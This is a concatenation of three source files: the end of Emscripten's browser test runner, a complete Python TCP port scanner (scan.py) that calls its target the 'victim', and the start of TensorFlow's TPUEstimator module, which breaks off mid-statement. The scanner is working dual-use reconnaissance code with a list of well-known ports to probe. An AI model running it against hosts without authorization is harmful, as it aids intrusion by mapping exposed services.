# (none is not a valid value otherwise; and we need the outside to know because if we
# raise an error in here, it is just swallowed in python's webserver code - we want
# the test to actually fail, which a webserver response can't do).
out_queue.put(None)
raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.send_header('Cache-Control', 'no-cache, must-revalidate')
self.send_header('Connection', 'close')
self.send_header('Expires', '-1')
self.end_headers()
self.wfile.write(b'OK')
elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
'''
To get logging to the console from browser tests, add this to
print/printErr/the exception handler in src/shell.html:
var xhr = new XMLHttpRequest();
xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
xhr.send();
'''
print('[client logging:', unquote_plus(self.path), ']')
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
elif self.path == '/check':
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
if not in_queue.empty():
# there is a new test ready to be served
url, dir = in_queue.get()
if DEBUG:
print('[queue command:', url, dir, ']')
assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
assert out_queue.empty(), 'the single response from the last test was read'
# tell the browser to load the test
self.wfile.write(b'COMMAND:' + url)
# move us to the right place to serve the files for the new test
os.chdir(dir)
else:
# the browser must keep polling
self.wfile.write(b'(wait)')
else:
# Use SimpleHTTPServer default file serving operation for GET.
if DEBUG:
print('[simple HTTP serving:', unquote_plus(self.path), ']')
SimpleHTTPRequestHandler.do_GET(self)
def log_request(self, code=0, size=0):
# don't log; too noisy
pass
# allows streaming compilation to work
SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
httpd = HTTPServer(('localhost', port), TestServerHandler)
httpd.serve_forever() # test runner will kill us
class BrowserCore(RunnerCore):
# note how many tests hang / do not send an output. if many of these
# happen, likely something is broken and it is best to abort the test
# suite early, as otherwise we will wait for the timeout on every
# single test (hundreds of minutes)
MAX_UNRESPONSIVE_TESTS = 10
unresponsive_tests = 0
def __init__(self, *args, **kwargs):
super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
if not EMTEST_BROWSER:
logger.info('Using default system browser')
webbrowser.open_new(url)
return
browser_args = shlex.split(EMTEST_BROWSER)
# If the given browser is a scalar, treat it like one of the possible types
# from https://docs.python.org/2/library/webbrowser.html
if len(browser_args) == 1:
try:
# This throws if the type of browser isn't available
webbrowser.get(browser_args[0]).open_new(url)
logger.info('Using Emscripten browser: %s', browser_args[0])
return
except webbrowser.Error:
# Ignore the exception and fallback to the custom command logic
pass
# Else assume the given browser is a specific program with additional
# parameters and delegate to that
logger.info('Using Emscripten browser: %s', str(browser_args))
subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
super(BrowserCore, cls).setUpClass()
cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
if not has_browser():
return
cls.browser_timeout = 60
cls.harness_in_queue = multiprocessing.Queue()
cls.harness_out_queue = multiprocessing.Queue()
cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
cls.harness_server.start()
print('[Browser harness server on process %d]' % cls.harness_server.pid)
cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
super(BrowserCore, cls).tearDownClass()
if not has_browser():
return
cls.harness_server.terminate()
print('[Browser harness server terminated]')
if WINDOWS:
# On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
# WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
time.sleep(0.1)
def assert_out_queue_empty(self, who):
if not self.harness_out_queue.empty():
while not self.harness_out_queue.empty():
self.harness_out_queue.get()
raise Exception('excessive responses from %s' % who)
# @param tries_left: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, tries_left=1):
if not has_browser():
return
if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
self.assert_out_queue_empty('previous test')
if DEBUG:
print('[browser launch:', html_file, ']')
if expectedResult is not None:
try:
self.harness_in_queue.put((
asbytes('http://localhost:%s/%s' % (self.port, html_file)),
self.get_dir()
))
received_output = False
output = '[no http server activity]'
start = time.time()
if timeout is None:
timeout = self.browser_timeout
while time.time() - start < timeout:
if not self.harness_out_queue.empty():
output = self.harness_out_queue.get()
received_output = True
break
time.sleep(0.1)
if not received_output:
BrowserCore.unresponsive_tests += 1
print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
if output is None:
# the browser harness reported an error already, and sent a None to tell
# us to also fail the test
raise Exception('failing test due to browser harness error')
if output.startswith('/report_result?skipped:'):
self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
else:
# verify the result, and try again if we should do so
try:
self.assertIdentical(expectedResult, output)
except Exception as e:
if tries_left > 0:
print('[test error (see below), automatically retrying]')
print(e)
return self.run_browser(html_file, message, expectedResult, timeout, tries_left - 1)
else:
raise e
finally:
time.sleep(0.1) # see comment about Windows above
self.assert_out_queue_empty('this test')
else:
webbrowser.open_new(os.path.abspath(html_file))
print('A web browser window should have opened a page containing the results of a part of this test.')
print('You need to manually look at the page to see that it works ok: ' + message)
print('(sleeping for a bit to keep the directory alive for the web browser..)')
time.sleep(5)
print('(moving on..)')
def with_report_result(self, user_code):
return '''
#define EMTEST_PORT_NUMBER %(port)d
#include "%(report_header)s"
%(report_main)s
%(user_code)s
''' % {
'port': self.port,
'report_header': path_from_root('tests', 'report_result.h'),
'report_main': open(path_from_root('tests', 'report_result.cpp')).read(),
'user_code': user_code
}
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
# make sure the pngs used here have no color correction, using e.g.
# pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
basename = os.path.basename(expected)
shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
run_process([PYTHON, EMCC] + args + ['--pre-js', path_from_root('tests', 'browser_reporting.js')])
def btest(self, filename, expected=None, reference=None, force_c=False,
reference_slack=0, manual_reference=False, post_build=None,
args=[], outfile='test.html', message='.', also_proxied=False,
url_suffix='', timeout=None, also_asmjs=False,
manually_trigger_reftest=False):
assert expected or reference, 'a btest must either expect an output, or have a reference image'
# if we are provided the source and not a path, use that
filename_is_src = '\n' in filename
src = filename if filename_is_src else ''
original_args = args[:]
if 'USE_PTHREADS=1' in args and self.is_wasm_backend():
# wasm2js does not support threads yet
also_asmjs = False
if 'WASM=0' not in args:
# Filter out separate-asm, which is implied by wasm
args = [a for a in args if a != '--separate-asm']
    # add in support for reporting results. this adds a header as an include so testcases can
# use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
# contains the implementation of REPORT_RESULT (we can't just include that implementation in
# the header as there may be multiple files being compiled here).
args += ['-DEMTEST_PORT_NUMBER=%d' % self.port,
'-include', path_from_root('tests', 'report_result.h'),
path_from_root('tests', 'report_result.cpp')]
if filename_is_src:
filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
with open(filepath, 'w') as f:
f.write(src)
else:
filepath = path_from_root('tests', filename)
if reference:
self.reference = reference
expected = [str(i) for i in range(0, reference_slack + 1)]
self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
if not manual_reference:
args = args + ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
# print('all args:', all_args)
try_delete(outfile)
self.compile_btest(all_args)
self.assertExists(outfile)
if post_build:
post_build()
if not isinstance(expected, list):
expected = [expected]
self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout)
# Tests can opt into being run under asmjs as well
if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
if also_proxied:
print('proxied...')
if reference:
assert not manual_reference
manual_reference = True
assert not post_build
post_build = self.post_manual_reftest
# run proxied
self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
build_dir,
output_dir,
generated_libs,
configure=['sh', './configure'],
configure_args=[],
make=['make'],
make_args=[],
cache=None,
cache_name=None,
env_init={},
native=False,
cflags=[]):
"""Build a library into a .bc file. We build the .bc file once and cache it
for all our tests. (We cache in memory since the test directory is destroyed
and recreated for each test. Note that we cache separately for different
compilers). This cache is just during the test runner. There is a different
concept of caching as well, see |Cache|.
"""
if type(generated_libs) is not list:
generated_libs = [generated_libs]
source_dir = path_from_root('tests', name.replace('_native', ''))
temp_dir = build_dir
project_dir = os.path.join(temp_dir, name)
if os.path.exists(project_dir):
shutil.rmtree(project_dir)
shutil.copytree(source_dir, project_dir) # Useful in debugging sometimes to comment this out, and two lines above
generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
env = Building.get_building_env(native, True, cflags=cflags)
for k, v in env_init.items():
env[k] = v
if configure:
try:
with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
stdout = out if EM_BUILD_VERBOSE < 2 else None
stderr = err if EM_BUILD_VERBOSE < 1 else None
Building.configure(configure + configure_args, env=env,
stdout=stdout,
stderr=stderr,
cwd=project_dir)
except subprocess.CalledProcessError:
with open(os.path.join(project_dir, 'configure_out')) as f:
print('-- configure stdout --')
print(f.read())
print('-- end configure stdout --')
with open(os.path.join(project_dir, 'configure_err')) as f:
print('-- configure stderr --')
print(f.read())
print('-- end configure stderr --')
raise
def open_make_out(mode='r'):
return open(os.path.join(project_dir, 'make.out'), mode)
def open_make_err(mode='r'):
return open(os.path.join(project_dir, 'make.err'), mode)
if EM_BUILD_VERBOSE >= 3:
make_args += ['VERBOSE=1']
try:
with open_make_out('w') as make_out:
with open_make_err('w') as make_err:
stdout = make_out if EM_BUILD_VERBOSE < 2 else None
stderr = make_err if EM_BUILD_VERBOSE < 1 else None
Building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
cwd=project_dir)
except subprocess.CalledProcessError:
with open_make_out() as f:
print('-- make stdout --')
print(f.read())
print('-- end make stdout --')
with open_make_err() as f:
print('-- make stderr --')
print(f.read())
print('-- end make stderr --')
raise
if cache is not None:
cache[cache_name] = []
for f in generated_libs:
basename = os.path.basename(f)
cache[cache_name].append((basename, open(f, 'rb').read()))
return generated_libs
def check_js_engines():
working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
if len(working_engines) < len(shared.JS_ENGINES):
print('Not all of the JS engines in JS_ENGINES appear to work.')
exit(1)
if EMTEST_ALL_ENGINES:
print('(using ALL js engines)')
else:
logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
'engines, which is slower but provides more coverage')
def get_and_import_modules():
modules = []
for filename in glob.glob(os.path.join(os.path.dirname(__file__), 'test*.py')):
module_dir, module_file = os.path.split(filename)
module_name, module_ext = os.path.splitext(module_file)
__import__(module_name)
modules.append(sys.modules[module_name])
return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
try:
suite = getattr(m, suite_name)
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
break
except AttributeError:
pass
args[i] = None
return [a for a in args if a is not None]
def args_for_random_tests(args, modules):
if not args:
return args
first = args[0]
if first.startswith('random'):
random_arg = first[6:]
num_tests, base_module, relevant_modes = get_random_test_parameters(random_arg)
for m in modules:
if hasattr(m, base_module):
base = getattr(m, base_module)
new_args = choose_random_tests(base, num_tests, relevant_modes)
print_random_test_statistics(num_tests)
return new_args
return args
def get_random_test_parameters(arg):
num_tests = 1
base_module = default_core_test_mode
relevant_modes = core_test_modes
if len(arg):
num_str = arg
if arg.startswith('other'):
base_module = 'other'
relevant_modes = ['other']
num_str = arg.replace('other', '')
elif arg.startswith('browser'):
base_module = 'browser'
relevant_modes = ['browser']
num_str = arg.replace('browser', '')
num_tests = int(num_str)
return num_tests, base_module, relevant_modes
def choose_random_tests(base, num_tests, relevant_modes):
tests = [t for t in dir(base) if t.startswith('test_')]
print()
chosen = set()
while len(chosen) < num_tests:
test = random.choice(tests)
mode = random.choice(relevant_modes)
new_test = mode + '.' + test
before = len(chosen)
chosen.add(new_test)
if len(chosen) > before:
print('* ' + new_test)
else:
# we may have hit the limit
if len(chosen) == len(tests) * len(relevant_modes):
print('(all possible tests chosen! %d = %d*%d)' % (len(chosen), len(tests), len(relevant_modes)))
break
return list(chosen)
def print_random_test_statistics(num_tests):
std = 0.5 / math.sqrt(num_tests)
expected = 100.0 * (1.0 - std)
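# e.g. num_tests=100 gives std = 0.5/sqrt(100) = 0.05, so expected = 95.00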
print()
print('running those %d randomly-selected tests. if they all pass, then there is a '
'greater than 95%% chance that at least %.2f%% of the test suite will pass'
% (num_tests, expected))
print()
def show():
print('if all tests passed then there is a greater than 95%% chance that at least '
'%.2f%% of the test suite will pass'
% (expected))
atexit.register(show)
def load_test_suites(args, modules):
loader = unittest.TestLoader()
unmatched_test_names = set(args)
suites = []
for m in modules:
names_in_module = []
for name in list(unmatched_test_names):
try:
operator.attrgetter(name)(m)
names_in_module.append(name)
unmatched_test_names.remove(name)
except AttributeError:
pass
if len(names_in_module):
loaded_tests = loader.loadTestsFromNames(sorted(names_in_module), m)
tests = flattened_tests(loaded_tests)
suite = suite_for_module(m, tests)
for test in tests:
suite.addTest(test)
suites.append((m.__name__, suite))
return suites, unmatched_test_names
def flattened_tests(loaded_tests):
tests = []
for subsuite in loaded_tests:
for test in subsuite:
tests.append(test)
return tests
def suite_for_module(module, tests):
suite_supported = module.__name__ in ('test_core', 'test_other')
has_multiple_tests = len(tests) > 1
has_multiple_cores = parallel_runner.num_cores() > 1
if suite_supported and has_multiple_tests and has_multiple_cores:
return parallel_runner.ParallelTestSuite()
return unittest.TestSuite()
def run_tests(options, suites):
resultMessages = []
num_failures = 0
print('Test suites:')
print([s[0] for s in suites])
# Run the discovered tests
testRunner = unittest.TextTestRunner(verbosity=2)
for mod_name, suite in suites:
print('Running %s: (%s tests)' % (mod_name, suite.countTestCases()))
res = testRunner.run(suite)
msg = ('%s: %s run, %s errors, %s failures, %s skipped' %
(mod_name, res.testsRun, len(res.errors), len(res.failures), len(res.skipped)))
num_failures += len(res.errors) + len(res.failures)
resultMessages.append(msg)
if len(resultMessages) > 1:
print('====================')
print()
print('TEST SUMMARY')
for msg in resultMessages:
print(' ' + msg)
# Return the number of failures as the process exit code for automating success/failure reporting.
return min(num_failures, 255)
def parse_args(args):
parser = argparse.ArgumentParser(prog='runner.py', description=__doc__)
parser.add_argument('tests', nargs='*')
return parser.parse_args(args[1:])  # skip argv[0], the program name
def main(args):
options = parse_args(args)
check_js_engines()
def prepend_default(arg):
if arg.startswith('test_'):
return default_core_test_mode + '.' + arg
return arg
tests = [prepend_default(t) for t in options.tests]
modules = get_and_import_modules()
all_tests = get_all_tests(modules)
tests = tests_with_expanded_wildcards(tests, all_tests)
tests = skip_requested_tests(tests, modules)
tests = args_for_random_tests(tests, modules)
suites, unmatched_tests = load_test_suites(tests, modules)
if unmatched_tests:
print('ERROR: could not find the following tests: ' + ' '.join(unmatched_tests))
return 1
return run_tests(options, suites)
if __name__ == '__main__':
try:
sys.exit(main(sys.argv))
except KeyboardInterrupt:
logger.warning('KeyboardInterrupt')
sys.exit(1)
|
scan.py
|
# Modules
import socket
import sys
import threading
import time
from optparse import OptionParser
# Usage text
usage_text = """
Usage: scan.py [kwargs]
ARGUMENTS (kwargs):
REQUIRED:
------------------------------------------------
--ip:
The IP of the 'victim'.
------------------------------------------------
OPTIONAL (One of these is needed):
------------------------------------------------
-p or --portscan [port limit]:
Just a simple scan up until the given port number.
------------------------------------------------
-w or --wp:
Scan through all of the well known ports.
If used in GUI, leave the port input blank.
------------------------------------------------
-s or --specificport [port]:
Scans a specific port.
------------------------------------------------
-f or --file [filename]:
Write scan reports to a file.
------------------------------------------------
HELP:
-h or --help:
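------------------------------------------------
EXAMPLES (illustrative only; the IP address and port values are placeholders):
python scan.py --ip 192.168.1.10 -p 1024
python scan.py --ip 192.168.1.10 -w -f report.txt
------------------------------------------------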
"""
# Usage
def usage():
print(usage_text)
sys.exit()
#Setting up the options for the terminal
parser = OptionParser()
parser.set_conflict_handler("resolve")
parser.add_option("-h", "--help", dest="help", action="store_true")
parser.add_option("--ip", dest="IP")
parser.add_option("-p", "--portscan", dest="port_scan")
parser.add_option("-w", "--wp", dest="known_ports", action="store_true")
parser.add_option("-s", "--specificport", dest="specific_port")
parser.add_option("-f","--file", dest="fileName")
(options, args) = parser.parse_args()
# Main class
class Scanner():
def __init__(self):
self.options = options.__dict__
self.IP = str(options.IP)
self.openPorts = []
self.methodCount = []
self.trues = []
self.methods = ["port_scan", "known_ports", "specific_port"]
self.wellKnownports = [20, 21, 22, 23, 25, 53, 67, 68, 80, 88, 101, 110, 111, 113, 115, 119, 135, 137, 138, 139, 143, 161, 194,
443, 445, 464, 512, 513, 531, 548, 626, 660, 687, 749, 751, 752, 873, 989, 990, 992, 993, 995, 1080, 1243, 1433, 1434,
1723, 1985, 2432, 2336, 3306, 3307, 3283, 3389, 5900, 8080, 9050, 9051, 9010, 33568, 40421, 60008]
self.outputText = []
# Updating info
def update_screen(self):
if __name__ == "__main__":
print(self.outputText[-1])
else:
pass
# Making threads
def make_thread(self,target,**kwargs):
thread = threading.Thread(target=target, args=(kwargs["ip"], kwargs["port"],))
thread.daemon = True
thread.start()
time.sleep(0.01)
# Method for executing functions
def LoopAndThread(self, ip):
# Check args
for i in self.options:
if (i in self.methods) and (self.options[i] is not None):
self.trues.append(i)
if len(self.trues) > 1:
print("Illegal amount of arguments")
usage()
# Loop and execute
self.startTime = time.time()
self.outputText.append(f"\nStart time of scan: {time.ctime()}\nHost: {ip}\n\nPORT STATE\n")
self.update_screen()
for i in self.options:
# Port scanning
if (i == "port_scan") and (self.options["port_scan"] is not None):
self.options[i] = int(self.options[i])
self.options[i] += 1
for port in range(int(self.options[i])):
self.make_thread(self.portScan,ip=ip,port=port)
self.openPorts = sorted(set(self.openPorts))
for i in self.openPorts:
self.outputText.append(f"{i} open")
self.update_screen()
self.outputText.append(f"\nScan is done: {ip} scanned in {(time.time() - self.startTime):.3} seconds")
self.update_screen()
# Well known port scanner
elif (i == "known_ports") and (self.options["known_ports"] is True):
for port in self.wellKnownports:
self.make_thread(self.wellKnownPortScan, ip=ip, port=port)
self.openPorts = sorted(set(self.openPorts))
for i in self.openPorts:
self.outputText.append(f"{i} open")
self.update_screen()
self.outputText.append(f"\nScan is done: {ip} scanned in {(time.time() - self.startTime):.3} seconds")
self.update_screen()
# Specific port scan
elif (i == "specific_port") and (self.options["specific_port"] is not None):
for l in range(3):
self.make_thread(self.SpecificPortScan, ip=ip,port=int(self.options[i]),)
self.openPorts = sorted(set(self.openPorts))
for i in self.openPorts:
self.outputText.append(f"{i} open")
self.update_screen()
if len(self.openPorts) == 0:
self.outputText.append(f"{self.options[i]} closed")
self.update_screen()
self.outputText.append(f"\nScan is done: {ip} scanned in {(time.time() - self.startTime):.3} seconds")
self.update_screen()
# Writing to file if needed
if options.fileName:
f = open(str(options.fileName), "a")
f.write("\n".join(self.outputText) + "\n")
f.close()
# Simple port scan method
def portScan(self, ip, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.result = self.sock.connect_ex((ip, port))
if self.result == 0 and port not in self.openPorts:
self.openPorts.append(port)
self.sock.close()
# Well known port scan
def wellKnownPortScan(self, ip, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.result = self.sock.connect_ex((ip, port))
if self.result == 0:
self.openPorts.append(port)
self.sock.close()
# Specific port scan
def SpecificPortScan(self, ip, port):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.result = self.sock.connect_ex((ip, port))
if self.result == 0:
self.openPorts.append(port)
self.sock.close()
# On-start
if __name__ == "__main__":
#Checking for needed arguments
if options.help:
usage()
if options.IP is None:
usage()
if (options.port_scan is None) and (options.known_ports is None) and (options.specific_port is None):
usage()
# Starting class
Scanning = Scanner()
Scanning.LoopAndThread(Scanning.IP)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
